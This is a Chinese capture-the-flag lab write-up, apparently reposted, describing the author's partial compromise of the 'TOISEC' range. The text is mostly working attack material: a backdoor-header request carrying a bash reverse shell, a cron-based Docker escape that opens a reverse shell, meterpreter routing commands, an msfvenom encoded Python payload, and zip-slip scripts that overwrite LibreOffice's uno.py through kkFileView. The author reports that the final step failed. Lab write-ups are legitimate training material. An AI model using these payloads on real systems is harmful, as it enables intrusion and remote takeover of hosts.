当前位置：首页 > ds >正文

春秋云镜 TOISEC 部分WP

ds 2025/8/25 12:41:21

入口机

 [2025-08-13 08:42:03] [INFO] 暴力破解线程数: 1[2025-08-13 08:42:03] [INFO] 开始信息扫描[2025-08-13 08:42:03] [INFO] 最终有效主机数量: 1[2025-08-13 08:42:04] [INFO] 开始主机扫描[2025-08-13 08:42:04] [INFO] 有效端口数量: 233[2025-08-13 08:42:04] [SUCCESS] 端口开放 39.98.108.138:110[2025-08-13 08:42:04] [SUCCESS] 端口开放 39.98.108.138:80[2025-08-13 08:42:04] [SUCCESS] 端口开放 39.98.108.138:22[2025-08-13 08:42:04] [SUCCESS] 服务识别 39.98.108.138:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.12 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.12.][2025-08-13 08:42:06] [SUCCESS] 服务识别 39.98.108.138:110 =>[2025-08-13 08:42:09] [SUCCESS] 服务识别 39.98.108.138:80 => [http] 版本:1.18.0 产品:nginx 系统:Linux 信息:Ubuntu[2025-08-13 08:42:13] [INFO] 存活端口数量: 3[2025-08-13 08:42:13] [INFO] 开始漏洞扫描[2025-08-13 08:42:13] [INFO] 加载的插件: pop3, ssh, webpoc, webtitle[2025-08-13 08:42:13] [SUCCESS] 网站标题 http://39.98.108.138      状态码:200 长度:8172   标题:无标题

目录穿越

 [08:43:18] Starting:[08:43:24] 200 -    6KB - /404.html[08:44:11] 301 -  178B  - /static  ->  http://39.98.108.138/static/[08:44:11] 301 -  178B  - /static..  ->  http://39.98.108.138/static../

拿到nginx配置文件

http://39.98.108.138/static..//etc/nginx/sites-enabled/default

 server {listen 80;server_name localhost;autoindex on;location / {root /var/www/html;index index.html index.htm;}location /static {alias /static/;}location /web_app-development-environment {proxy_pass http://127.0.0.1:8080;proxy_set_header Host $host;proxy_set_header X-Real-IP $remote_addr;proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;proxy_set_header X-Forwarded-Proto $scheme;}error_page 404 /404.html;location = /404.html {root /var/www/html;}}

还有一个docker的yaml文件发现

 version: '2'services:web:image: vulhub/php:8.1-backdoorvolumes:- ./index.php:/var/www/html/index.php:rw- /etc/:/backup:rwports:- "127.0.0.1:8080:80"restart: unless-stopped

所以我们访问/web_app-development-environment即可，搜对应漏洞，发现加上特定user-agentt头部即可

getshell

 GET /web_app-development-environment HTTP/1.1Host: 39.98.108.138Accept-Encoding: gzip, deflateAccept: */*Accept-Language: enUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36user-agentt:zerodiumsystem("bash -c 'exec bash -i >& /dev/tcp/ip/port 0>&1'");Connection: close

docker逃逸

进入是docker环境，需要逃逸，根据yaml文件，发现主机的/etc文件夹被挂载到容器的/backup，有读写权限，计划任务反弹shell

 echo '* * * * * root bash -c "bash -i >& /dev/tcp/ip/9001 0>&1"' > /backup/cron.d/escape

进入为root权限即可拿到第一个flag

查看网络

 root@web:/# /sbin/ifconfig/sbin/ifconfigbr-1a7f15ab0e4a: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500inet 172.19.0.1  netmask 255.255.0.0  broadcast 172.19.255.255inet6 fe80::42:80ff:fe5e:e041  prefixlen 64  scopeid 0x20<link>ether 02:42:80:5e:e0:41  txqueuelen 0  (Ethernet)RX packets 167  bytes 14925 (14.9 KB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 191  bytes 14899 (14.8 KB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0docker0: flags=4099<UP,BROADCAST,MULTICAST>  mtu 1500inet 172.17.0.1  netmask 255.255.0.0  broadcast 172.17.255.255ether 02:42:3c:98:59:e4  txqueuelen 0  (Ethernet)RX packets 0  bytes 0 (0.0 B)RX errors 0  dropped 0  overruns 0  frame 0TX packets 0  bytes 0 (0.0 B)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0eth0: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500inet 192.168.22.151  netmask 255.255.255.0  broadcast 192.168.22.255inet6 fe80::216:3eff:fe39:476f  prefixlen 64  scopeid 0x20<link>ether 00:16:3e:39:47:6f  txqueuelen 1000  (Ethernet)RX packets 125079  bytes 105906375 (105.9 MB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 44669  bytes 37880353 (37.8 MB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536inet 127.0.0.1  netmask 255.0.0.0inet6 ::1  prefixlen 128  scopeid 0x10<host>loop  txqueuelen 1000  (Local Loopback)RX packets 1911  bytes 156883 (156.8 KB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 1911  bytes 156883 (156.8 KB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0veth176c729: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500inet6 fe80::24c4:daff:fea4:2e6b  prefixlen 64  scopeid 0x20<link>ether 26:c4:da:a4:2e:6b  txqueuelen 0  (Ethernet)RX packets 167  bytes 17263 (17.2 KB)RX errors 0  dropped 0  overruns 0  frame 0TX packets 206  bytes 16045 (16.0 KB)TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

内网信息收集

使用fscan扫描内网

 ┌──────────────────────────────────────────────┐│    ___                              _        ││   / _ \     ___  ___ _ __ __ _  ___| | __    ││  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    ││ / /_\\_____\__ \ (__| | | (_| | (__|   <     ││ \____/     |___/\___|_|  \__,_|\___|_|\_\    │└──────────────────────────────────────────────┘Fscan Version: 2.0.0[2025-08-13 09:34:40] [INFO] 暴力破解线程数: 1[2025-08-13 09:34:40] [INFO] 开始信息扫描[2025-08-13 09:34:40] [INFO] CIDR范围: 192.168.22.0-192.168.22.255[2025-08-13 09:34:40] [INFO] 生成IP范围: 192.168.22.0.%!d(string=192.168.22.255) - %!s(MISSING).%!d(MISSING)[2025-08-13 09:34:40] [INFO] 解析CIDR 192.168.22.151/24 -> IP范围 192.168.22.0-192.168.22.255[2025-08-13 09:34:40] [INFO] 最终有效主机数量: 256[2025-08-13 09:34:40] [INFO] 开始主机扫描[2025-08-13 09:34:40] [SUCCESS] 目标 192.168.22.151  存活 (ICMP)[2025-08-13 09:34:40] [SUCCESS] 目标 192.168.22.152  存活 (ICMP)[2025-08-13 09:34:40] [SUCCESS] 目标 192.168.22.253  存活 (ICMP)[2025-08-13 09:34:43] [INFO] 存活主机数量: 3[2025-08-13 09:34:43] [INFO] 有效端口数量: 233[2025-08-13 09:34:43] [SUCCESS] 端口开放 192.168.22.151:80[2025-08-13 09:34:43] [SUCCESS] 端口开放 192.168.22.151:22[2025-08-13 09:34:43] [SUCCESS] 端口开放 192.168.22.152:445[2025-08-13 09:34:43] [SUCCESS] 端口开放 192.168.22.152:139[2025-08-13 09:34:43] [SUCCESS] 端口开放 192.168.22.152:135[2025-08-13 09:34:43] [SUCCESS] 服务识别 192.168.22.151:22 => [ssh] 版本:8.2p1 Ubuntu 4ubuntu0.12 产品:OpenSSH 系统:Linux 信息:Ubuntu Linux; protocol 2.0 Banner:[SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.12.][2025-08-13 09:34:46] [SUCCESS] 端口开放 192.168.22.152:8012[2025-08-13 09:34:48] [SUCCESS] 服务识别 192.168.22.151:80 => [http] 版本:1.18.0 产品:nginx 系统:Linux 信息:Ubuntu[2025-08-13 09:34:48] [SUCCESS] 服务识别 192.168.22.152:445 => [2025-08-13 09:34:48] [SUCCESS] 服务识别 192.168.22.152:139 =>  Banner:[.][2025-08-13 09:34:57] [SUCCESS] 服务识别 192.168.22.152:8012 => [http][2025-08-13 09:35:48] [SUCCESS] 服务识别 192.168.22.152:135 => [2025-08-13 09:35:48] [INFO] 存活端口数量: 6[2025-08-13 09:35:48] [INFO] 开始漏洞扫描[2025-08-13 09:35:48] [INFO] 加载的插件: findnet, ms17010, netbios, smb, smb2, smbghost, ssh, webpoc, webtitle[2025-08-13 09:35:48] [SUCCESS] 网站标题 http://192.168.22.151     状态码:200 长度:8172   标题:无标题[2025-08-13 09:35:48] [SUCCESS] NetInfo 扫描结果目标主机: 192.168.22.152主机名: opserver发现的网络接口:IPv4地址:└─ 192.168.22.152[2025-08-13 09:35:48] [SUCCESS] NetBios 192.168.22.152  WORKGROUP\OPSERVER            [2025-08-13 09:35:48] [SUCCESS] 网站标题 http://192.168.22.152:8012 状态码:200 长度:13154  标题:kkFileView演示首页

配置代理

 ./proxy socks -t tcp -p "0.0.0.0:6666" --daemon

稳定shell

 python3 -c 'import pty; pty.spawn("/bin/bash")'stty raw -echo;fgxterm

上传后门，上线msf，添加路由

 linux/x64/meterpreter/reverse_tcprun post/multi/manage/autoroute

192.168.22.152

8012端口存在kkFileView演示首页，搜索漏洞发现存在文件上传的RCE，复现一下即可

文件上传RCE

使用msf生成python木马文件

 msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.22.151 LPORT=6677 -f raw -o kkview.pyroot@hcss-ecs-e5a5:~/tmp# cat kkview.pyexec(__import__('zlib').decompress(__import__('base64').b64decode(__import__('codecs').getencoder('utf-8')('eNo9UE1LxDAQPTe/orckGMO2dLO6WEHEg4gI7t5EpE1GDU3TkGS1Kv53G7J4mce8efPmQ49u8rEMkxwgsm+je9Z3AUTDQvQHGVnUI6DXyZdzqW3pO/sGpFrRLSqi/1piEdrczDOQmh3z3cP13ctu/3hzdU+TjsvJWpCREFyd17wSZ7xeYF1hJsRmQ5Oo99ANqIBZgovJPY3nwQA4sqbItHkrfrCukwPBl7eYBe5BfpCG0qfVM1LtMTcUfb5rA6UBSxS9MIudOvmvnmaaIphBknQ4VyCn0XkIgeQf8F40iVSQlOwHB7wNvxT9AXIzX24=')[0])))

利用python脚本生成可完成目录穿越的压缩包

Linux POC

 import zipfileif __name__ == "__main__":try:binary1 = b'test'binary2 = b'exec(__import__(\'base64\').b64decode(__import__(\'codecs\').getencoder(\'utf-8\')(\'eNo9UE1LxDAQPTe/orckGMO2dLO6WEHEg4gI7t5EpE1GDU3TkGS1Kv53G7J4mce8efPmQ49u8rEMkxwgsm+je9Z3AUTDQvQHGVnUI6DXyZdzqW3pO/sGpFrRLSqi/1piEdrczDOQmh3z3cP13ctu/3hzdU+TjsvJWpCREFyd17wSZ7xeYF1hJsRmQ5Oo99ANqIBZgovJPY3nwQA4sqbItHkrfrCukwPBl7eYBe5BfpCG0qfVM1LtMTcUfb5rA6UBSxS9MIudOvmvnmaaIphBknQ4VyCn0XkIgeQf8F40iVSQlOwHB7wNvxT9AXIzX24=\')[0])))'zipFile = zipfile.ZipFile("hack.zip", "a", zipfile.ZIP_DEFLATED)info = zipfile.ZipInfo("hack.zip")zipFile.writestr("test", binary1)zipFile.writestr("../../../../../../../../../../../../../../../../../../../opt/libreoffice7.3/program/uno.py", binary2) #也有可能7.5zipFile.close()except IOError as e:raise e

Windows POC

 import zipfileif __name__ == "__main__":try:binary1 = b'test1'binary2 = b'exec(__import__(\'base64\').b64decode(__import__(\'codecs\').getencoder(\'utf-8\')(\'eNo9UE1LxDAQPTe/orckGMO2dLO6WEHEg4gI7t5EpE1GDU3TkGS1Kv53G7J4mce8efPmQ49u8rEMkxwgsm+je9Z3AUTDQvQHGVnUI6DXyZdzqW3pO/sGpFrRLSqi/1piEdrczDOQmh3z3cP13ctu/3hzdU+TjsvJWpCREFyd17wSZ7xeYF1hJsRmQ5Oo99ANqIBZgovJPY3nwQA4sqbItHkrfrCukwPBl7eYBe5BfpCG0qfVM1LtMTcUfb5rA6UBSxS9MIudOvmvnmaaIphBknQ4VyCn0XkIgeQf8F40iVSQlOwHB7wNvxT9AXIzX24=\')[0])))'zipFile = zipfile.ZipFile("hack.zip", "a", zipfile.ZIP_DEFLATED)info = zipfile.ZipInfo("hack.zip")zipFile.writestr("test1", binary1)zipFile.writestr("../../../../../server/LibreOfficePortable/App/libreoffice/program/uno.py", binary2)zipFile.close()except IOError as e:raise e

设置监听

 msf6 payload(python/meterpreter/reverse_tcp) > set LHOST 192.168.22.151  LHOST => 192.168.22.151msf6 payload(python/meterpreter/reverse_tcp) > set LPORT 6677LPORT => 6677msf6 payload(python/meterpreter/reverse_tcp) > exploit [*] Payload Handler Started as Job 1[*] Started reverse TCP handler on 192.168.22.151:6677 via the meterpreter on session 1msf6 payload(python/meterpreter/reverse_tcp) >

上传完zip文件后预览，然后创建一个odt后缀文件，内容随意，上传后点击预览，uno文件就会被追加我们添加的那一段，从而RCE

不过并没有成功，没继续往后打了，感觉是目录穿越不成功，但是本地的一样版本复现是可以的

求助一下各位大佬有什么思路

查看全文

http://www.xdnf.cn/news/18851.html